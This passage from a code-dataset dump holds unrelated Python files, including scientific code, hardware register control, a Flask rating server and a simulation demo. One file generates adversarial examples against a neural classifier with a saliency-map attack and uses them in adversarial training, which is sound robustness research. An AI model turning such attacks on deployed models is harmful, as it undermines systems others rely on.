405\n\n\n@pytest.mark.django_db\ndef test_event_delete(api_client, user, event):\n api_client.force_authenticate(user)\n\n response = api_client.delete(reverse('event-detail', kwargs={'pk': event.id}))\n assert response.status_code == 204\n\n response = api_client.get(reverse('event-detail', kwargs={'pk': event.id}))\n assert response.status_code == 410\n","sub_path":"events/tests/test_event_delete.py","file_name":"test_event_delete.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451688922","text":"import tkinter as tk\r\ntop=tk.Tk()\r\nhello=tk.Label(top,text='hello,world')\r\nhello.pack()\r\nquit=tk.Button(top,text='QUIT',command=top.quit,bg='red',fg='white')\r\nquit.pack(fill=tk.X,expand=1) #pack的参数都是些什么意思\r\ntk.mainloop()\r\n\r\n'''\r\npack 
参数说明\r\nafter -- 将组件放置在其他组件之后\r\nbefore -- 之前\r\nfill -- X横向填充(默认,各组件自上而下), Y竖向填充(各组件自左往右)\r\nexpand -- 1父外框大小改变时,自动扩充大小,0为false\r\nside -- 组件在父组件的哪一边上 left right top bottom (使用时使用tkinter.TOP或者tkinter.E等等)\r\nanchor -- 对齐方式 顶对齐n,底对齐s,左w,右e\r\n'''","sub_path":"tkhello3.py","file_name":"tkhello3.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106628963","text":"__author__ = 'jameskrach'\n__email__ = 'jck2156@columbia.edu'\n\nimport csv\nfrom random import shuffle\nfrom operator import itemgetter\nfrom collections import Counter\n\nimport numpy as np\n\n\ndef read_trainer(file):\n \"\"\"Opens file and returns each observation as an element of data.\n data[i][0] is the class and data[i][1:] is the observation.\"\"\"\n with open(file, 'rU') as f:\n temp = list(list(item) for item in csv.reader(f, delimiter=','))\n data = [[temp[i][1], np.array(list(map(float, temp[i][2:])))] for i in range(len(temp))]\n return data\n\n\ndef strip_observations(known_set):\n \"\"\"Creates an array of just the observations (in the same order as known_set).\"\"\"\n obs = known_set[0][1]\n for i in range(1, len(known_set)):\n obs = np.vstack((obs, known_set[i][1]))\n return obs\n\n\ndef strip_classes(known_set):\n \"\"\"Returns a list of just the classes of known points.\"\"\"\n cls = []\n for i in range(len(known_set)):\n cls.append(known_set[i][0])\n return cls\n\n\ndef make_synth():\n \"\"\"Makes synthetic data, takes no arguments for simplicity. Change parameters in function\n to change the data set.\"\"\"\n mean1 = [2, 5.5]\n cov1 = [[1, 1], [1, 2.5]]\n n1 = 250\n c1 = []\n rand = np.random.multivariate_normal(mean1, cov1, n1)\n for i in range(n1):\n c1.append(['1', rand[i]])\n\n mean2 = [.5, 1]\n cov2 = [[1, 0], [0, 1]]\n n2 = 250\n c2 = []\n rand = np.random.multivariate_normal(mean2, cov2, n2)\n for i in range(n2):\n c2.append(['2', rand[i]])\n\n return c1 + c2\n\n\ndef even_split(lst, p):\n \"\"\"Splits a list as evenly as possible into p elements. Shortest lists at the end.\"\"\"\n num_long = len(lst) % p # Number of longer-by-1 lists\n num_short = p - num_long\n if num_long:\n long_case = (len(lst)//p) + 1 # Length of a long list\n short_case = (len(lst)//p) # Length of a short list\n else:\n long_case = 0\n short_case = int(len(lst)/p)\n p_lists = []\n inx = 0\n for i in range(num_long):\n p_lists.append(lst[inx:inx+long_case])\n inx += long_case\n for i in range(num_short):\n p_lists.append(lst[inx:inx+short_case])\n inx += short_case\n return p_lists\n\n\ndef KNNclassifier(training, test, k, type_norm):\n \"\"\"Classifies test data by taking the l2-norm from a training set. 
All operations are\n vectorized so it should be fast.\"\"\"\n classified = []\n mat = strip_observations(training)\n for i in test:\n temp = np.copy(mat)\n for j in range(len(temp)):\n temp[j] -= i # Subtract test observation i from each row of a temporary array\n dist = []\n for l in range(len(temp)):\n dist.append((np.linalg.norm(temp[l], ord=type_norm), training[l][0])) # Calculate norm and append\n dist = sorted(dist, key=itemgetter(0)) # Sorts by first element of tuple\n knn = [dist[i][1] for i in range(k)] # classes of k nearest points\n i_class = Counter(knn).most_common(1) # mode of knn\n classified.append(i_class[0][0]) # Append class of i_class to output\n return classified\n\n\ndef NNclassifier(training, test):\n \"\"\"Uses KNNClassifier with k=1.\"\"\"\n return KNNclassifier(training, test, 1)\n\n\ndef n_validator(data, p, classifier, *args):\n \"\"\"Works for p >= 2.\"\"\"\n shuffle(data)\n chunks = even_split(data, p)\n correct = 0\n for i in range(len(chunks)):\n temp_trainer = []\n for j in chunks[0:i]:\n temp_trainer += j\n for j in chunks[i+1:]:\n temp_trainer += j\n temp_test = strip_observations(chunks[i])\n actual_class = strip_classes(chunks[i])\n model = classifier(temp_trainer, temp_test, *args)\n for j in range(len(actual_class)):\n if actual_class[j] == model[j]:\n correct += 1\n return correct / len(data)","sub_path":"hw6/neighbor.py","file_name":"neighbor.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266351181","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport time\nimport copy\nimport tempfile\nimport numpy\nimport scipy.linalg\nimport pyscf.lib.logger as logger\nimport pyscf.scf\nfrom pyscf.mcscf import casci\nfrom pyscf.mcscf import aug_hessian\nfrom pyscf.mcscf import mc1step\nfrom pyscf.mcscf import mc2step\n\n\nclass CASSCF(mc1step.CASSCF):\n def __init__(self, mf, ncas, nelecas, ncore=None):\n assert(mf.mol.symmetry)\n# Ag, A1 or A\n#TODO: self.wfnsym = pyscf.symm.param.CHARACTER_TABLE[mol.groupname][0][0]\n self.orbsym = []\n mc1step.CASSCF.__init__(self, mf, ncas, nelecas, ncore)\n\n def mc1step(self, mo_coeff=None, ci0=None, macro=None, micro=None, **cikwargs):\n if mo_coeff is None:\n mo_coeff = self.mo_coeff\n else:\n self.mo_coeff = mo_coeff\n if macro is None:\n macro = self.max_cycle_macro\n if micro is None:\n micro = self.max_cycle_micro\n\n self.mol.check_sanity(self)\n\n self.dump_flags()\n\n #irrep_name = self.mol.irrep_name\n irrep_name = self.mol.irrep_id\n self.orbsym = pyscf.symm.label_orb_symm(self.mol, irrep_name,\n self.mol.symm_orb,\n self.mo_coeff)\n\n if not hasattr(self.fcisolver, 'orbsym') or \\\n not self.fcisolver.orbsym:\n ncore = self.ncore\n nocc = self.ncore + self.ncas\n self.fcisolver.orbsym = self.orbsym[ncore:nocc]\n\n self.converged, self.e_tot, e_cas, self.ci, self.mo_coeff = \\\n mc1step.kernel(self, mo_coeff, \\\n tol=self.conv_tol, macro=macro, micro=micro, \\\n ci0=ci0, verbose=self.verbose, **cikwargs)\n #if self.verbose >= logger.INFO:\n # self.analyze(mo_coeff, self.ci, verbose=self.verbose)\n return self.e_tot, e_cas, self.ci, self.mo_coeff\n\n def mc2step(self, mo_coeff=None, ci0=None, macro=None, micro=None, **cikwargs):\n if mo_coeff is None:\n mo_coeff = self.mo_coeff\n else:\n self.mo_coeff = mo_coeff\n if macro is None:\n macro = self.max_cycle_macro\n if micro is None:\n micro = self.max_cycle_micro\n\n self.mol.check_sanity(self)\n\n self.dump_flags()\n\n #irrep_name = 
self.mol.irrep_name\n irrep_name = self.mol.irrep_id\n self.orbsym = pyscf.symm.label_orb_symm(self.mol, irrep_name,\n self.mol.symm_orb,\n self.mo_coeff)\n if not hasattr(self.fcisolver, 'orbsym') or \\\n not self.fcisolver.orbsym:\n ncore = self.ncore\n nocc = self.ncore + self.ncas\n self.fcisolver.orbsym = self.orbsym[ncore:nocc]\n\n self.converged, self.e_tot, e_cas, self.ci, self.mo_coeff = \\\n mc2step.kernel(self, mo_coeff, \\\n tol=self.conv_tol, macro=macro, micro=micro, \\\n ci0=ci0, verbose=self.verbose, **cikwargs)\n #if self.verbose >= logger.INFO:\n # self.analyze(mo_coeff, self.ci, verbose=self.verbose)\n return self.e_tot, e_cas, self.ci, self.mo_coeff\n\n def gen_g_hop(self, mo, casdm1, casdm2, eris):\n g_orb, h_op, h_diag = mc1step.gen_g_hop(self, mo, casdm1, casdm2, eris)\n g_orb = _symmetrize(self.unpack_uniq_var(g_orb), self.orbsym,\n self.mol.groupname)\n h_diag = _symmetrize(self.unpack_uniq_var(h_diag), self.orbsym,\n self.mol.groupname)\n def sym_h_op(x):\n hx = h_op(x)\n hx = _symmetrize(self.unpack_uniq_var(hx), self.orbsym,\n self.mol.groupname)\n return self.pack_uniq_var(hx)\n return self.pack_uniq_var(g_orb), sym_h_op, \\\n self.pack_uniq_var(h_diag)\n\n def rotate_orb(self, mo, casdm1, casdm2, eris, dx=0):\n u, dx, g_orb, jkcnt = \\\n mc1step.rotate_orb_ah(self, mo, casdm1, casdm2, eris, dx,\n self.verbose)\n u = _symmetrize(u, self.orbsym, self.mol.groupname)\n dx = _symmetrize(self.unpack_uniq_var(dx), self.orbsym,\n self.mol.groupname)\n return u, self.pack_uniq_var(dx), g_orb, jkcnt\n\ndef _symmetrize(mat, orbsym, groupname, wfnsym=0):\n irreptab = pyscf.symm.param.IRREP_ID_TABLE[groupname]\n if isinstance(wfnsym, str):\n wfnsym = irreptab[wfnsym]\n\n mat1 = numpy.zeros_like(mat)\n for i0 in set(orbsym):\n irallow = wfnsym ^ i0\n lst = [j for j,i in enumerate(orbsym) if i == irallow]\n for j in lst:\n mat1[j,lst] = mat[j,lst]\n return mat1\n\n\nif __name__ == '__main__':\n from pyscf import gto\n from pyscf import scf\n import pyscf.fci\n from pyscf.mcscf import addons\n\n mol = gto.Mole()\n mol.verbose = 0\n mol.output = None\n\n mol.atom = [\n ['O', ( 0., 0. , 0. 
)],\n ['H', ( 0., -0.757, 0.587)],\n ['H', ( 0., 0.757 , 0.587)],]\n mol.basis = {'H': 'cc-pvdz',\n 'O': 'cc-pvdz',}\n mol.symmetry = 1\n mol.build()\n\n m = scf.RHF(mol)\n ehf = m.scf()\n mc = CASSCF(m, 6, 4)\n mc.fcisolver = pyscf.fci.solver(mol)\n mc.verbose = 4\n mo = addons.sort_mo(mc, m.mo_coeff, (3,4,6,7,8,9), 1)\n emc = mc.mc1step(mo)[0]\n print(ehf, emc, emc-ehf)\n #-76.0267656731 -76.0873922924 -0.0606266193028\n print(emc - -76.0873923174, emc - -76.0926176464)\n\n mc = CASSCF(m, 6, (3,1))\n #mc.fcisolver = pyscf.fci.direct_spin1\n mc.fcisolver = pyscf.fci.solver(mol, False)\n mc.verbose = 4\n emc = mc.mc1step(mo)[0]\n print(emc - -75.7155632535814)\n","sub_path":"mcscf/mc1step_symm.py","file_name":"mc1step_symm.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"56669894","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 18 15:11:14 2015\r\n\r\n@author: wsong\r\n\"\"\"\r\n\r\nfrom lxml.html import parse\r\nfrom urllib2 import urlopen\r\nfrom pandas import Series,DataFrame\r\n\r\nparsed=parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))\r\ndoc=parsed.getroot()\r\n\r\nlinks=doc.findall('.//a')\r\n\r\nlnk1=links[28]\r\nhref1=lnk1.get('href')\r\ntxt=lnk1.text_content()\r\n\r\nurls=[lnk.get('href') for lnk in doc.findall('.//a')]\r\nurls[-10:]\r\n\r\ntables=doc.findall('.//table')\r\n#calls=tables[1]\r\n#puts=tables[2]\r\n#\r\n#rows=calls.findall('.//tr')\r\n#\r\n#def _unpack(row,kind='td'):\r\n# elts=row.findall('.//%s' % kind)\r\n# return [val.text_content() for val in elts]\r\n#\r\n#up1=_unpack(rows[0],kind='th')\r\n#up2=_unpack(rows[1],kind='td')\r\n#\r\n#\r\n#from pandas.io.parsers import TextParser\r\n#\r\n#def parse_options_data(table):\r\n# rows=table.findall('.//tr')\r\n# header=_unpack(rows[0],kind='th')\r\n# data=[_unpack(r) for r in rows[1:]]\r\n# return TextParser(data,names=header).get_chunk(0)\r\n#\r\n#call_data=parse_options_data(calls)\r\n#put_data=parse_options_data(puts)\r\n\r\n\r\n\r\nfrom lxml import objectify\r\n\r\npath='ex7.txt'\r\nparsed=objectify.parse(open(path))\r\nroot=parsed.getroot()\r\n\r\ndata=[]\r\nskip_fields=['genre']\r\n\r\nfor elt in root.book:\r\n el_data={}\r\n for child in elt.getchildren():\r\n if child.tag in skip_fields:\r\n continue\r\n el_data[child.tag]=child.pyval\r\n data.append(el_data)\r\n\r\ndf1=DataFrame(data)\r\n\r\nfrom StringIO import StringIO\r\ntag='Google'\r\nroot=objectify.parse(StringIO(tag)).getroot()\r\n\r\nroot.tag\r\nroot.get('href')\r\nroot.text\r\n\r\n\r\nframe=pd.read_csv('ex4.txt')\r\nframe.to_pickle('frame_pickle')\r\n\r\nframe2=pd.read_pickle('frame_pickle')\r\n\r\n\r\nxls_file1=pd.ExcelFile('ExcelTest.xlsx')\r\nxls_file2=pd.ExcelFile('ExcelTest.xls')\r\n\r\ntable1=xls_file1.parse('Sheet1')\r\ntable2=xls_file1.parse('Sheet1')\r\n\r\n\r\n","sub_path":"dataXML.py","file_name":"dataXML.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"85216023","text":"class Solution:\r\n # @param n, an integer\r\n # @return an integer\r\n def reverseBits(self, n):\r\n\r\n m, k = 0, 2 ** 31\r\n\r\n for i in xrange(32):\r\n\r\n n, m, k = n / 2, m + (n % 2) * k, k / 2\r\n\r\n return m\r\n","sub_path":"190-reverseBit.py","file_name":"190-reverseBit.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246108040","text":"# 
-*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 13 09:57:04 2017\n\n@author: Administrator\n\"\"\"\n\nfrom EV_FPGA import XilinxFPGA\nfrom EV_REG_CTRL import REG_CTRL\nimport time\nGREG_DAC_34H84_CTRL = 20\nclass DAC_34H84_test_data_CTRL(REG_CTRL):\n addrType = \"FpgaPcieAddr\"\n baseAddr = GREG_DAC_34H84_CTRL\n ch_select= 0\n status = {\n \"sync_freq_word\":0,\n \"phy_rst\" :0,\n \"test_mode\" :1,\n \"test_data\" :0,\n \"parttern_10\" :0,\n \"parttern_32\" :0,\n \"parttern_54\" :0,\n \"parttern_76\" :0,\n \"seq_maxlimit\" :0,\n \"squ_step\" :0\n }\n ctrl_dict = {\n # signal_name: [start_bit,end_bit,reg_offset,rw]\n \"sync_freq_word\": [31,16,0,'rw'],\n \"phy_rst\" : [4,4, 0,'rw'], \n \"test_mode\" : [2, 0, 0,'rw'],\n \"test_data\" : [15,0, 1,'rw'],\n \"parttern_10\" : [31,0, 2,'rw'],\n \"parttern_32\" : [31,0, 3,'rw'],\n \"parttern_54\" : [31,0, 4,'rw'],\n \"parttern_76\" : [31,0, 5,'rw'],\n \"seq_maxlimit\" : [15,0, 6,'rw'],\n \"squ_step\" : [31,16,6,'rw'], \n } \n \n def __init__(self, fpga, baseAddr=-1):\n REG_CTRL.__init__(self,fpga, baseAddr) \n\n def set_test_mode(self,mode,wdata):\n self.ctrl(\"test_mode\",mode) \n self.ctrl(\"test_data\",wdata)\n def set_io_test_pattern_0(self):\n \"\"\"default pattern\"\"\"\n self.ctrl(\"parttern_10\",0xb6b67a7a) \n self.ctrl(\"parttern_32\",0x4545eaea) \n self.ctrl(\"parttern_54\",0x16161a1a) \n self.ctrl(\"parttern_76\",0xc6c6aaaa)\n# self.ctrl(\"parttern_10\",0x0000ffff) \n# self.ctrl(\"parttern_32\",0x0000ffff) \n# self.ctrl(\"parttern_54\",0x0000ffff) \n# self.ctrl(\"parttern_76\",0x0000ffff)\n def set_io_test_pattern_1(self):\n \"\"\"default pattern\"\"\"\n self.ctrl(\"parttern_10\",0x0000ffff) \n self.ctrl(\"parttern_32\",0x0000ffff) \n self.ctrl(\"parttern_54\",0x0000ffff) \n self.ctrl(\"parttern_76\",0x0000ffff)\n \n def phy_rst(self):\n self.ctrl(\"phy_rst\",1)\n self.ctrl(\"phy_rst\",0) \n def set_squ_step_limt(self,step,limit):\n self.ctrl(\"squ_step\",step)\n self.ctrl(\"seq_maxlimit\",limit)\n \n#class DAC_34H84_test1_data_CTRL(REG_CTRL):\n# addrType = \"FpgaPcieAddr\"\n# baseAddr = GREG_DAC_34H84_CTRL\n# ch_select= 0\n# status = {\n# \"test_data\" :0\n# }\n# ctrl_dict = {\n# # signal_name: [start_bit,end_bit,reg_offset,rw]\n# \n# \"test_data\" : [31,16, 0,'rw'],\n# \n# } \n# \n# def __init__(self, fpga, baseAddr=-1):\n# REG_CTRL.__init__(self,fpga, baseAddr) \n#\n# def test(self,wdata):\n# self.ctrl(\"test_data\",wdata) \n# \n# def test_wave(self):\n# i=0;\n# while 1 :\n# i=0\n# while i <0xffff :\n# self.test(i)\n# i=i+1;\n","sub_path":"PyFPGA_mini/EV_AD34H84_phy_data_test.py","file_name":"EV_AD34H84_phy_data_test.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275082662","text":"import tensorflow as tf\nimport keras\nimport numpy as np\nfrom cleverhans.utils_keras import KerasModelWrapper\nfrom cleverhans.attacks import SaliencyMapMethod\nfrom cleverhans.dataset import MNIST\nfrom cleverhans.train import train\nfrom cleverhans.utils import AccuracyReport\nfrom cleverhans.loss import CrossEntropy\nfrom cleverhans.utils_tf import model_eval\nfrom models import cnn_model, mlp_model\n\nNB_EPOCHS_LEGITIMATE = 100\nNB_EPOCHS_ADV = 50\nBATCH_SIZE = 128\nLEARNING_RATE = .001\nTRAIN_DIR = 'train_dir'\nFILENAME = 'mnist.ckpt'\nLABEL_SMOOTHING = 0\n\nkeras.layers.core.K.set_learning_phase(0)\n\n# Object used to keep track of (and return) key accuracies\nreport = AccuracyReport()\n\n# Set TF random seed to improve 
reproducibility\ntf.set_random_seed(1234)\n\n# Create TF session and set as Keras backend session\n#sess = tf.Session()\n#sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True))\nsess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))\nkeras.backend.set_session(sess)\n\n# Get MNIST test data\nmnist = MNIST(train_start=0, train_end=2500,\n test_start=0, test_end=10000)\nx_train, y_train = mnist.get_set('train')\nx_test, y_test = mnist.get_set('test')\n\n# Obtain Image Parameters\nimg_rows, img_cols, nchannels = x_train.shape[1:4]\nnb_classes = y_train.shape[1]\n\n# Define input TF placeholder\nx = tf.placeholder(tf.float32, shape=(None, img_rows, img_cols, nchannels))\ny = tf.placeholder(tf.float32, shape=(None, nb_classes))\n\n# Define TF model graph\n\nmodel = cnn_model(img_rows=img_rows, img_cols=img_cols, channels=nchannels, nb_filters=128, nb_classes=nb_classes)\n\n#model = mlp_model(img_rows=img_rows, img_cols=img_cols,nb_classes=nb_classes)\npreds = model(x)\nprint(\"Defined TensorFlow model graph.\")\n\n# Train an MNIST model\ntrain_params_leg = {\n 'nb_epochs': NB_EPOCHS_LEGITIMATE,\n 'batch_size': BATCH_SIZE,\n 'learning_rate': LEARNING_RATE,\n 'train_dir': TRAIN_DIR,\n 'filename': FILENAME\n}\n\nrng = np.random.RandomState([2018, 11, 26])\nwrap = KerasModelWrapper(model)\n\n# function that is run after each training iteration\ndef evaluate():\n # Evaluate the accuracy of the MNIST model on legitimate test examples\n eval_params = {'batch_size': BATCH_SIZE}\n acc_test = model_eval(sess, x, y, preds, x_test, y_test, args=eval_params)\n acc_train = model_eval(sess, x, y, preds, x_train, y_train, args=eval_params)\n report.clean_train_clean_eval = acc_test\n print('Test set accuracy on legitimate examples: %0.4f' % acc_test)\n print('Training set accuracy on legitimate examples: %0.4f' % acc_train)\n\n# training on legitimate data\nloss = CrossEntropy(wrap, smoothing=LABEL_SMOOTHING)\ntrain(sess, loss, x_train, y_train, evaluate=evaluate, args=train_params_leg, rng=rng)\n\n# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph\njsma = SaliencyMapMethod(wrap, sess=sess)\njsma_params = {'theta': 1., 'gamma': 0.1,\n 'clip_min': 0., 'clip_max': 1.,\n 'y_target': None}\ndef attack(x):\n return jsma.generate(x, **jsma_params)\n\nadv_x = attack(x)\n\npreds_adv = model(adv_x)\n\nprint(\"Repeating the process, using adversarial training\")\n\nloss_2 = CrossEntropy(wrap, smoothing=LABEL_SMOOTHING, attack=attack)\n\ndef evaluate_2():\n # Accuracy of adversarially trained model on legitimate test inputs\n eval_params = {'batch_size': BATCH_SIZE}\n accuracy = model_eval(sess, x, y, preds, x_test, y_test,\n args=eval_params)\n print('Test accuracy on legitimate examples: %0.4f' % accuracy)\n report.adv_train_clean_eval = accuracy\n\n # Accuracy of the adversarially trained model on adversarial examples\n #accuracy = model_eval(sess, x, y, preds_adv, x_test,\n # y_test, args=eval_params)\n #print('Test accuracy on adversarial examples: %0.4f' % accuracy)\n #report.adv_train_adv_eval = accuracy\n\ntrain_params_adv = {\n 'nb_epochs': NB_EPOCHS_ADV,\n 'batch_size': BATCH_SIZE,\n 'learning_rate': LEARNING_RATE,\n 'train_dir': TRAIN_DIR,\n 'filename': FILENAME\n}\n# Perform and evaluate adversarial training\ntrain(sess, loss_2, x_train, y_train, evaluate=evaluate_2, args=train_params_adv, 
rng=rng)","sub_path":"JSMA.py","file_name":"JSMA.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"630358103","text":"from flask import Flask, render_template\nfrom flask_restful import Resource, Api, reqparse, inputs\nfrom flask_cors import CORS\nfrom sqlalchemy import create_engine, select\nfrom sqlalchemy import Table, Column, Integer, String, MetaData\nimport operator\nimport sys\n\n# Create a engine for connecting to SQLite3.\ndb = create_engine('sqlite:///fussball.db')\n\nmetadata = MetaData()\nplayers = Table('players', metadata,\n Column('name', String),\n Column('rating', Integer),\n )\n\nmatches = Table('matches', metadata,\n Column('a_off', String),\n Column('a_def', String),\n Column('a_score', Integer),\n Column('b_off', String),\n Column('b_def', String),\n Column('b_score', Integer),\n )\n\nmetadata.create_all(db)\n\napp = Flask(__name__)\napp.config['BUNDLE_ERRORS'] = True\napi = Api(app)\nCORS(app)\n\n\nclass Matches(Resource):\n def get(self):\n conn = db.connect()\n s = select([matches])\n result = conn.execute(s)\n return {'matches': [dict(row) for row in result]}\n\n name_options = {\n 'type': inputs.regex('^.+$'),\n 'help': \"Must not be empty\",\n 'required': True,\n 'nullable': False\n }\n\n score_options = {\n 'type': inputs.int_range(0, 10),\n 'required': True,\n 'nullable': False\n }\n\n post_parser = reqparse.RequestParser()\n post_parser.add_argument('a_off', **name_options)\n post_parser.add_argument('a_def', **name_options)\n post_parser.add_argument('a_score', **score_options)\n post_parser.add_argument('b_off', **name_options)\n post_parser.add_argument('b_def', **name_options)\n post_parser.add_argument('b_score', **score_options)\n\n def post(self):\n conn = db.connect()\n args = self.post_parser.parse_args()\n ins = matches.insert().values(**args)\n result = conn.execute(ins)\n return {'result': dict(result)}\n\n\nclass Ratings(Resource):\n def rating(self, player):\n try:\n return self.ratings[player]\n except KeyError:\n self.ratings[player] = 1200\n return self.ratings[player]\n\n def tag(self, player_name):\n name_tag = \"{} ({})\"\n return name_tag.format(player_name, self.ratings[player_name])\n\n def get(self):\n conn = db.connect()\n s = select([matches])\n result = conn.execute(s)\n\n self.ratings = {}\n\n for match in result:\n a_off = match['a_off']\n a_def = match['a_def']\n a_score = match['a_score']\n b_off = match['b_off']\n b_def = match['b_def']\n b_score = match['b_score']\n\n team_a = self.rating(a_off) + self.rating(a_def)\n team_b = self.rating(b_off) + self.rating(b_def)\n\n e_a = 1 / (1 + 10 ** ((team_b - team_a)/400.0))\n e_b = 1 / (1 + 10 ** ((team_a - team_b)/400.0))\n\n r_a = a_score / float(a_score + b_score)\n r_b = b_score / float(a_score + b_score)\n\n diff_a = int(round(32 * (r_a - e_a)))\n diff_b = int(round(32 * (r_b - e_b)))\n\n team_tag = \"{} & {}\"\n team_a_tag = team_tag.format(self.tag(a_off), self.tag(a_def))\n team_b_tag = team_tag.format(self.tag(b_off), self.tag(b_def))\n print(\"{} vs {}\".format(team_a_tag, team_b_tag))\n print(\"Chance to win: {} vs {}\".format(e_a, e_b))\n print(\"Actual result: {}-{}\".format(a_score, b_score))\n print(\"Actual distribution: {} vs {}\".format(r_a, r_b))\n print(\"Adjusting {} and {}\".format(diff_a, diff_b))\n\n self.ratings[a_off] += diff_a\n self.ratings[a_def] += diff_a\n self.ratings[b_off] += diff_b\n self.ratings[b_def] += diff_b\n\n new_ratings_tags = [\n 
self.tag(a_off),\n self.tag(a_def),\n self.tag(b_off),\n self.tag(b_def),\n ]\n print(\"New Ratings: {}, {}, {}, {}.\".format(*new_ratings_tags))\n\n return self.ratings\n\n\napi.add_resource(Matches, '/matches')\napi.add_resource(Ratings, '/ratings')\n\n\n@app.route(\"/\")\ndef home():\n r = Ratings()\n ratings = r.get()\n\n items = ratings.items()\n key = operator.itemgetter(1)\n sorted_ratings = sorted(items, key=key, reverse=True)\n\n return render_template('home.html', ratings=sorted_ratings)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=int(sys.argv[1]))\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"419753","text":"from enum import Enum, unique\n\nfrom greensim import now, advance\n\nfrom itsim.machine import Node\nfrom itsim.machine.file_system import File\nfrom itsim.machine.file_system.access_policies import Policy, TargetedPolicy\nfrom itsim.machine.process_management.thread import Thread\nfrom itsim.machine.user_management import UserAccount, UserGroup\nfrom itsim.simulator import Simulator\n\nfrom typing import Callable\n\n\n@unique\nclass Colors(Enum):\n RED = '\\033[31m'\n GREEN = '\\033[32m'\n YELLOW = '\\033[33m'\n CLOSE = '\\033[0m'\n\n\ndef log(msg: str, color: Colors = None) -> None:\n if color is not None:\n msg = color.value + msg + Colors.CLOSE.value\n print(msg)\n\n\ndef run_sample() -> None:\n sim = Simulator()\n\n # Simple output for the child processes\n def short_kid(t: Thread):\n advance(10)\n log(\"I'm a child process! #%s > #%s\" % (t._process._parent._n, t._process._n), Colors.YELLOW)\n\n def ping(thread: Thread) -> None:\n proc = thread._process\n log(\"Howdy. 
It's %s O'clock\" % now())\n log(\"\\t I'm in process number %s\" % proc._n)\n if proc._parent is not None:\n log(\"\\t\\t I'm a proud descendant of process %s\" % proc._parent._n)\n log(\"\\t\\t I'm in thread number %s\" % thread._n)\n\n # Show off forking from withing a process\n proc.fork_exec(sim, short_kid)\n\n # This just fills the function set in the Thread object to show that it works and how it looks\n thread.clone(lambda _: advance(1))\n thread.clone(lambda _: advance(1))\n\n # Builder patter for a priori setup of functions running at specific times\n pm = Node().with_proc_at(sim, 1, ping)\n\n # Setting up a new process, forking it from outside, and setting up some concurrent threads\n proc = pm.fork_exec(sim, ping)\n kid = proc.fork_exec(sim, ping)\n kid.exc_in(sim, 1, ping)\n kid.exc_in(sim, 2, ping)\n kid.exc_in(sim, 3, ping)\n\n user: UserAccount = UserAccount(\"demo\")\n group: UserGroup = UserGroup(\"demo\")\n group.add_members(user)\n\n default_policy = TargetedPolicy(False, False, False)\n user_policy = TargetedPolicy(False, False, True)\n group_policy = TargetedPolicy(False, False, True)\n\n user_allowed: Policy = Policy(default_policy, user_rules={user: user_policy})\n group_allowed: Policy = Policy(default_policy, group_rules={group: group_policy})\n runnable_a: File[Callable[[Thread], None]] = File(ping, user_allowed)\n runnable_b: File[Callable[[Thread], None]] = File(ping, group_allowed)\n pm.run_file(sim, runnable_a, user)\n pm.run_file(sim, runnable_b, user)\n sim.run()\n\n\nif __name__ == '__main__':\n run_sample()\n","sub_path":"examples/design/node_structure/simple_processes.py","file_name":"simple_processes.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"425292255","text":"old_row = []\n# asks user to enter the desired height of the pascal triangle\nheight = int(input(\"Enter the desired height of Pascal's triangle\"))\nx=1\nnew_row = []\nmaster_list = []\n# function to create new row of pascal triangle\n\n\ndef make_new_row(old_row):\n new_row = []\n i=0\n row1 = []\n row2 = [1]\n length = len(old_row)\n\n if old_row == row1:\n old_row.append(1)\n master_list.append(row2)\n return old_row\n if old_row == row2:\n old_row.append(1)\n return old_row\n # appends first element of the old_row to the first element of the new row\n new_row.append(old_row[i])\n # uses length of old_row to determine how many appends are required to create new row\n while i < length-1:\n new_row.append(old_row[i]+ old_row[i+1])\n i += 1\n # appends last element of original row to last element of the new row\n new_row.append(old_row[length - 1])\n old_row = new_row\n # appends old row to master_list each iteration of the while loop below\n master_list.append(old_row)\n return old_row\n\n# calls function make_new_row until specified height has been reached\n\n\nprint(\"Printing lists one list at a time\")\n\n\nwhile x < height:\n row1 = []\n row2 = [1]\n if old_row == row1:\n old_row = make_new_row(old_row)\n master_list.append(old_row)\n print(old_row)\n\n old_row = make_new_row(old_row)\n\n print(old_row)\n\n x += 1\nprint(\"Printing whole lists of lists\")\nprint(master_list)\n\n","sub_path":"exam.py","file_name":"exam.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"366429497","text":"import torch\nfrom torchvision import datasets, transforms\nimport torch.optim as optim\nfrom models 
